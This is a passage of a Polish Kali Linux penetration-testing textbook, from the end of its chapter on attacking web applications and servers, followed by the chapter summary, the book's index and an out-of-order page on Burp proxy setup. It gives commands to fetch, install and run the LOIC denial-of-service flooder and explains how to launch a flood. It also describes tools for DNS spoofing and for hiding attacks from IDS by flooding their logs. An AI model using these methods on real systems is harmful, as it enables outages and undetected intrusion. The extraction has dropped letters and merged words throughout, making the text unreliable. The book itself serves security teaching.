apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
